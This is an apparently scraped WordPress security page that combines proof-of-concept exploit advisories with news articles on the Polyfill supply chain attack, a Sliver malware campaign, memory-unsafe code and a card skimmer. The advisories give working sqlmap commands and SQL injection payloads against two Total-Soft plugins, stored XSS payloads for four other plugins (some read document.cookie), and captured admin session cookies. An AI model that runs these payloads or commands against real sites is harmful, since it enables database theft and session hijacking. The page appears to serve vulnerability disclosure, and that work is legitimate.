WordPress Poll plugin version 2.3.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WordPress Poll Plugin SQL Injection # Date: 2024-07-06# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://total-soft.com/wp-poll/# Version 2.3.61. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `TS Poll  > `Create Pool ` > ` Use Theme` and save it. > https://localhost/wordpress/wp-admin/admin.php?page=ts-poll-builder&tsp-id=1     ```2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc3. Search for orderby parameter.## SQLMAP COMMANDpython3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=ts-poll&orderby=Question_Title&order=desc" \--batch \--dbms=mysql \--thread=10 \--no-cast \--random-agent \-v 3 \--tamper="between,randomcase,space2comment" \--level=5 \--risk=3 \-p orderby \--cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|e111b736b22043864d0f8ea6da823ca00768a110af4da612c555add1979839d1; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720435164|r5jSRyl4XMzcZz3xllDos9veD7hga8U8qFIWPQHv5Kr|173622110c7f3812695b26c96ba4905a7c760ac41e37645150dd4869ae884c4b; wordpress_test_cookie=WP Cookie check; wp-settings-time-1=1720266472"## RESULT---Parameter: orderby (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---

WordPress Poll 2.3.6 SQL Injection

WordPress Video Gallery - YouTube Gallery And Vimeo Gallery version 2.3.6 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Video Gallery - YouTube Gallery and Vimeo Gallery Plugin SQL Injection # Date: 2024-07-05# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://total-soft.com/wp-video-gallery/# Version 2.3.61. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `TS Video Gallery  > `Create ` > ` Use Theme` and save it.     ```2. After save it back to TS Video Gallery Click title : https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc3. Search for orderby parameter.## SQLMAP COMMANDpython3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \wordpress_test_cookie=WP Cookie check; \wp-settings-time-1=1720173805" --thread 10 ## RESULTsqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:---Parameter: orderby (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[08:37:45] [INFO] the back-end DBMS is MySQL[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))web application technology: Apache 2.4.54, PHP 8.0.23back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

WordPress Video Gallery - YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection

The supply chain attack targeting widely-used Polyfill[.]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.
This includes references to "https://cdn.polyfill[.]io" or "https://cdn.polyfill[.]com" in their HTTP responses, the attack

Supply Chain Attack / Malware

The supply chain attack targeting widely-used Polyfill\[.\]io JavaScript library is wider in scope than previously thought, with new findings from Censys showing that over 380,000 hosts are embedding a polyfill script linking to the malicious domain as of July 2, 2024.

This includes references to "https://cdn.polyfill\[.\]io" or "https://cdn.polyfill\[.\]com" in their HTTP responses, the attack surface management firm said.

"Approximately 237,700, are located within the Hetzner network (AS24940), primarily in Germany," it noted. "This is not surprising – Hetzner is a popular web hosting service, and many website developers leverage it."

Further analysis of the affected hosts has revealed domains tied to prominent companies like WarnerBros, Hulu, Mercedes-Benz, and Pearson that reference the malicious endpoint in question.

Details of the attack emerged in late June 2024 when Sansec alerted that code hosted on the Polyfill domain had been modified to redirect users to adult- and gambling-themed websites. The code changes were made such that the redirections only took place at certain times of the day and only against visitors who met certain criteria.

The nefarious behavior is said to have been introduced after the domain and its associated GitHub repository were sold to a Chinese company named Funnull in February 2024.

The development has since prompted domain registrar Namecheap to suspend the domain, content delivery networks such as Cloudflare to automatically replace Polyfill links with domains leading to alternative safe mirror sites, and Google to block ads for sites embedding the domain.

While the operators attempted to relaunch the service under a different domain named polyfill\[.\]com, it was also taken down by Namecheap as of June 28, 2024. Of the two other domains registered by them since the start of July – polyfill\[.\]site and polyfillcache\[.\]com –the latter remains up and running.

On top of that, a more extensive network of potentially related domains, including bootcdn\[.\]net, bootcss\[.\]com, staticfile\[.\]net, staticfile\[.\]org, unionadjs\[.\]com, xhsbpza\[.\]com, union.macoms\[.\]la, newcrbpc\[.\]com, has been uncovered as tied to the maintainers of Polyfill, indicating that the incident might be part of a broader malicious campaign.

"One of these domains, bootcss\[.\]com, has been observed engaging in malicious activities that are very similar to the polyfill\[.\]io attack, with evidence dating back to June 2023," Censys noted, adding it discovered 1.6 million public-facing hosts that link to these suspicious domains.

"It wouldn't be entirely unreasonable to consider the possibility that the same malicious actor responsible for the polyfill.io attack might exploit these other domains for similar activities in the future."

The development comes as WordPress security company Patchstack warned of cascading risks posed by the Polyfill supply chain attack on sites running the content management system (CMS) through dozens of legitimate plugins that link to the rogue domain.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Polyfill[.]io Attack Impacts Over 380,000 Hosts, Including Major Companies

WordPress Photo Gallery plugin version 1.8.26 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Photo Gallery Version 1.8.26 Stored XSS# Date: 2024-07-03# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://10web.io/plugins/wordpress-photo-gallery/# Version 1.8.26### Steps to Execute the Payload:1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 2. Write Distance between pictures place your payload**: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`3. Click Update4. You will see the payload executed

WordPress Photo Gallery 1.8.26 Cross Site Scripting

Cybersecurity researchers have discovered an attack campaign that targets various Israeli entities with publicly-available frameworks like Donut and Sliver.
The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on

Cybersecurity researchers have discovered an attack campaign that targets various Israeli entities with publicly-available frameworks like Donut and Sliver.

The campaign, believed to be highly targeted in nature, "leverage target-specific infrastructure and custom WordPress websites as a payload delivery mechanism, but affect a variety of entities across unrelated verticals, and rely on well-known open-source malware," HarfangLab said in a report last week.

The French company is tracking the activity under the name Supposed Grasshopper. It's a reference to an attacker-controlled server ("auth.economy-gov-il\[.\]com/SUPPOSED\_GRASSHOPPER.bin"), to which a first-stage downloader connects to.

This downloader, written in Nim, is rudimentary and is tasked with downloading the second-stage malware from the staging server. It's delivered by means of a virtual hard disk (VHD) file that's suspected to be propagated via custom WordPress sites as part of a drive-by download scheme.

The second-stage payload retrieved from the server is Donut, a shellcode generation framework, which serves as a conduit for deploying an open-source Cobalt Strike alternative called Sliver.

"The operators also put some notable efforts in acquiring dedicated infrastructure and deploying a realistic WordPress website to deliver payloads," the researchers said. "Overall, this campaign feels like it could realistically be the work of a small team."

The end goal of the campaign is currently unknown, although HarfangLab theorized that it could also be associated with a legitimate penetration testing operation, a possibility that raises its own set of questions surrounding transparency and the need for impersonating Israeli government agencies.

The disclosure comes as the SonicWall Capture Labs threat research team detailed an infection chain that employs booby-trapped Excel spreadsheets as a starting point to drop a trojan known as Orcinius.

"This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated," the company said. "It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Israeli Entities Targeted by Cyberattack Using Donut and Sliver Frameworks

WordPress FooGallery plugin version 2.4.16 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: FooGallery version : 2.4.16 Stored XSS# Date: 2024-07-02# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/foogallery/# Version 2.4.16### Steps to Execute the Payload:1. **Click Add New Gallery**: [Add New Gallery](https://127.0.0.1/wp-admin/post-new.php?post_type=foogallery)2. **Write Add Title your payload**: `"><sVg/onLy=1 onLoaD=confirm(1)//`3. **Click Publish**, then click **Create Gallery Page**.4. **Verify Execution**: You will see the payload executed in the usage field.

WordPress FooGallery 2.4.16 Cross Site Scripting

WordPress Gallery version 2.3.6 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Gallery Version 2.3.6 Stored XSS# Date: 2024-07-01# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://total-soft.com/wp-video-gallery/# Version 2.3.6### Steps to Execute the Payload:1. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `TS Video Gallery  > `Create ` > ` Use Theme` via the following URL:      ```     https://127.0.0.1/wp-admin/admin.php?page=tsvg-builder&tsvg-theme=grid_video_gallery     ```2. **Insert the Payload:**   - In the **Click New Video** section, **Write Add Title insert the following payload:     ```     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>     ```3. **Save and Verify:**   - You should see the payload executed.

WordPress Gallery 2.3.6 Cross Site Scripting

WordPress WPCode Lite plugin version 2.1.14 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS# Date: 2024-06-30# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin# Version 2.1.14### Steps to Execute the Payload:1. **Access the Admin Panel:**   - Navigate to the admin panel of your WordPress site.   - Go to `Code Snippets > `Edit Snippet` via the following URL:      ```     https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10     ```2. **Insert the Payload:**   - In the **Code Preview** section, insert the following payload:     ```     "><img src=x onerrora=confirm() onerror=confirm(document.cookie)>     ```3. **Save and Verify:**   - Active , Save the changes.   - Navigate to the main page of your site:     ```     https://127.0.0.1/     ```   - You should see the payload executed.Post Request :POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2Host: 127.0.0.1Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3DhtmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10Content-Type: application/x-www-form-urlencodedContent-Length: 673Origin: https://vagabondcreature.s3-tastewp.comDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailerswpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error

WordPress WPCode Lite 2.1.14 Cross Site Scripting

Despite more than 50% of all open source code being written in memory-unsafe languages like C++, we are unlikely to see a massive overhaul to code bases anytime soon.

A comprehensive new study has unearthed fresh details on the extensive and troubling use of memory-unsafe code in major open source software (OSS) projects.

However, the chances that fresh insight on a long known issue will spur any immediate changes to the software landscape remain bleak, given just how enormous, costly, and complex the task is of rewriting codebases entirely in memory-safe code.

Memory-unsafe programming languages such as C and C++ allow programmers to have more direct control over memory-related functions in code, which can often lead to very common application security issues like buffer overflows and use-after-free errors. Such flaws represent a large proportion of all vulnerabilities in modern application software. In contrast, memory-safe languages — the most common examples of which include Rust, Python, Java, and Go —offer guardrails such as built-in runtime and compile time checks to mitigate against common memory related errors.

**Most OSS Projects Contain Memory-Unsafe Code**

The US Cybersecurity and Infrastructure Security Agency (CISA) along with the FBI and counterparts at the Australian Cyber Security Centre and the Canadian Centre for Cyber Security this week released a report summarizing the results of their investigation into the use of memory-unsafe code in OSS.

The findings, while troubling, are not entirely unexpected given past data on the extensive use of memory-unsafe languages in almost all modern codebases. Fifty-two percent of the 172 major open source projects that the research authors looked at contained code written in a memory-unsafe language. More than half (55%) of the total lines of code in all the projects combined were written in a memory-unsafe language, with the larger projects being the worst culprits.

Some 95% of the total lines of code in Linux for instance are memory-unsafe. For MySQL Server, that number was 84%; for TensorFlow it was 64%; for Zephyr 84%; and for Chromium 51%. On average, 26% of the total lines of code in the 10 largest open source projects consisted of memory-unsafe code. Even projects written in memory-safe languages were at risk from dependencies on unsafe components.

"Most critical open source projects analyzed, even those written in memory-safe languages, potentially contain memory safety vulnerabilities," the report noted. "This can be caused by direct use of memory-unsafe languages or external dependency on projects that use memory-unsafe languages."

In addition, the tendency — and often the need — to disable memory-safety features to accommodate functional requirements in applications can often neutralize the benefits of using otherwise memory-safe languages.  

"These limitations highlight the need for continued diligent use of memory safe programming languages, secure coding practices, and security testing," the report authors noted.

**CISA Consistent With Previous OSS Data**

The findings are consistent with numerous previous studies that have examined the extensive problems tied to the use of memory-unsafe languages.  

And indeed, concerns over the ubiquity of the problem have prompted calls for change over the years. The most recent is a February 2024 technical report from the White House that urged industry stakeholders to go back to the building blocks and start over with using memory safe code in all software. In 2022, the US National Security Agency (NSA) urged software makers and all organizations developing software to consider adopting memory-safe languages to reduce risk from memory management related software issues in modern code bases. The continued pounding away at the topic over the years has spurred some change, but most expect it will take years — if not even decades — for a whole scale shift to memory-safe languages to happen.

"Adopting memory-safe code is challenging, primarily because changing a programming language often requires a complete rewrite of existing code," says Neatsun Ziv, CEO and Co-Founder of OX Security. The cost and effort required to undertake such a massive overhaul without significant economic incentives will likely make any change, a slow process.

**Making the World Memory-Safe: A Huge & Complex Challenge**

Omkhar Arasaratnam, general manager at OpenSSF says memory safety issues aren't specifically a problem for either open or closed-source software. It's a problem in general for all modern software.

"There are many memory-safe languages available today like JavaScript, Python, and Java, but software engineers often use memory-unsafe older languages like C/C++ for performance or low-level hardware access," he says.

Also, while Rust has emerged as a viable alternative to C/C++ for low level systems programming in recent years, there are many embedded systems and safety-critical applications for which Rust is not appropriate, he adds.

"While it is certainly possible to write memory-safe code in a memory-unsafe language, 25 years of CVEs tells us it is highly unlikely," Arasaratnam says. "It is not that people are bad programmers, but defensively writing code that is memory-safe in a memory-unsafe language is very difficult," he notes. As newer projects adopt memory-safe languages, expect the use of memory-unsafe languages to decrease over time, in all but niche applications.

Tim Mackey, head of software supply chain risk strategy at Synopsys Software Integrity Group, says the new report does a good job showing how some major open source software projects such as Kubernetes and WordPress are authored in a memory-safe language. However, there are other issues that remain unexplored, he says. For example, it would be interesting to know if memory-safe languages are being used in new projects on GitHub, and whether memory-safe libraries are being used as dependencies in larger projects.

"We can safely say that awareness of memory safe languages is growing, but is it growing at a rate that would displace older languages? For example, are the creators of new embedded software solutions using C++ or Rust, and to what degree?"

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CISA's Flags Memory-Unsafe Code in Major Open Source Projects

Multiple content management system (CMS) platforms like WordPress, Magento, and OpenCart have been targeted by a new credit card web skimmer called Caesar Cipher Skimmer.
A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information. 
According to Sucuri, the latest campaign entails making malicious modifications to the

Web Skimming / Website Security

Multiple content management system (CMS) platforms like WordPress, Magento, and OpenCart have been targeted by a new credit card web skimmer called Caesar Cipher Skimmer.

A web skimmer refers to malware that is injected into e-commerce sites with the goal of stealing financial and payment information.

According to Sucuri, the latest campaign entails making malicious modifications to the checkout PHP page associated with the WooCommerce plugin for WordPress ("form-checkout.php") to steal credit card details.

"For the past few months, the injections have been changed to look less suspicious than a long obfuscated script," security researcher Ben Martin said, noting the malware's attempt to masquerade as Google Analytics and Google Tag Manager.

Specifically, it employs the same substitution mechanism employed in Caesar cipher to encode the malicious piece of code into a garbled string and conceal the external domain that's used to host the payload.

It's presumed that all the websites have been previously compromised through other means to stage a PHP script that goes by the names "style.css" and "css.php" in an apparent effort to mimic an HTML style sheet and evade detection.

These scripts, in turn, are designed to load another obfuscated JavaScript code that creates a WebSocket and connects to another server to fetch the actual skimmer.

"The script sends the URL of the current web pages, which allows the attackers to send customized responses for each infected site," Martin pointed out. "Some versions of the second layer script even check if it is loaded by a logged-in WordPress user and modify the response for them."

Some versions of the script have programmer-readable explanations (aka comments) written in Russian, suggesting that the threat actors behind the operation are Russian-speaking.

The form-checkout.php file in WooCommerce is not the only method used to deploy the skimmer, for the attackers have also been spotted misusing the legitimate WPCode plugin to inject it into the website database.

On websites that use Magento, the JavaScript injections are performed on database tables such as core\_config\_data. It's currently not known how this is accomplished on OpenCart sites.

Due to its prevalent use as a foundation for websites, WordPress and the larger plugin ecosystem have become a lucrative target for malicious actors, allowing them easy access to a vast attack surface.

It's imperative that site owners keep their CMS software and plugins up-to-date, enforce password hygiene, and periodically audit them for the presence of suspicious administrator accounts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#wordpress